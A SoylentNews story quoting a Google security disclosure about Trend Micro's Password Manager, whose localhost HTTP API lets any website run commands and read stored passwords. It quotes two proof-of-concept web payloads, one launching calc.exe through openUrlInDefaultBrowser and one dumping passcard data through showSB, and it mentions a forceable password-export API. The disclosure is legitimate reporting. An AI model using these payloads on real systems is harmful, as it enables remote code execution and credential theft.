SoylentNews

el_oscuro [soylentnews.org] writes:

According to google-security-research [google.com], "When you install TrendMicro Antivirus on Windows, by default a component called Password Manager is also installed and automatically launched on startup.

http://www.trendmicro.com/us/home/products/software/password-manager/index.html [trendmicro.com]

This product is primarily written in JavaScript with node.js, and opens multiple HTTP RPC ports for handling API requests.

It took about 30 seconds to spot one that permits arbitrary command execution, openUrlInDefaultBrowser, which eventually maps to ShellExecute().

This means any website can launch arbitrary commands, like this:

x = new XMLHttpRequest()
x.open("GET", "https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe true);
try { x.send(); } catch (e) {};

TrendMicro helpfully adds a self-signed https certificate for localhost to the trust store, so you don't need to click through any pesky security errors."

It is not like they would ever be useful, now would they?

We always make jokes about posting our passwords on our homepage, but apparently with TrendMicro, that is a feature:

"I noticed that there is a nice clean API for accessing passwords stored in the password manager, so anyone can just read all of the stored passwords:

https://localhost:49155/api/showSB?url=javascript:topWindow.process.mainModule.exports.Tower.handle.getUserData(function(n{alert(JSON.stringify(JSON.parse(n).data.passcard[0]))}) [localhost]

Users are prompted on installation to export their browser passwords, but that's optional. I think an attacker can force it with /exportBrowserPasswords API, so even that doesn't help. I sent an email pointing this out:"

I could go on, but go ahead and RTFA. You can't make this stuff up.

Original Submission